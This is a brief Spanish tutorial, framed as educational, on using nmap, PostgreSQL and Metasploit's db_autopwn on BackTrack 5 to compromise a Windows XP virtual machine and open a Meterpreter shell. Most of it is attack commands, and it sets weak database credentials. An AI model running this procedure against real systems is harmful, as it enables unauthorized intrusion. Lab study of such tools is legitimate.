Está en la página 1de 5

ESTE TUTORIAL ES PARA FINES EDUCATIVIOS Como hacer un autopwn en backtrack 5 con nmap, metasploit y postgresql Aqu les

dejo el post original de la info para que lo verifiquen: Metasploit db_autopwn using PostgreSQL

El backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal:

apt-get install postgresql libpq-dev


el libpq trabaja con las peticiones y respuestas entre cliente y servidor en el postgresql. Al finalizar la instalacin conectamos con el postgresql y cambiamos el password

sudo su postgres -c psql

Aqu pones el password nuevo. ALTER USER postgres WITH PASSWORD 'password' ;

despus

\q

sudo passwd -d postgres sudo su postgres -c passwd


con este se cambia el password

Esto es para conectarse del ruby al postgresql.

gem install pg

Ahora llamamos a metasploit

msfconsole

db_driver postgresql
y para conectar con la base de datos

db_connect postgres:password@127.0.0.1/metasploitdb
El password que habas puesto anterior mente. Aqu va el nombre que le quiera asignar a la base de datos.

Ahora utilizamos nmap para ver las vulnerabilidades de la vctima. nmap -sV -O 10.0.0.71 <-------- el numero ip de la vctima que para el tutorial es una maquina virtual de xp sp 1.

Nmap escaneo los puertos e identifico el sistema operativo de la vctima. Ahora procedemos con el ataque.

db_hosts db_autopwn -t -p -e
AL terminar el autopwn muestra las posibles sesiones.

Para entrar a una de ellas sessions -i 1 el numero es la sesin que fue elegida.

Aqu se puede ver como entra al shell de windows desde meterpreter.

ESTE TUTORIAL ES PARA FINES EDUCATIVIOS

También podría gustarte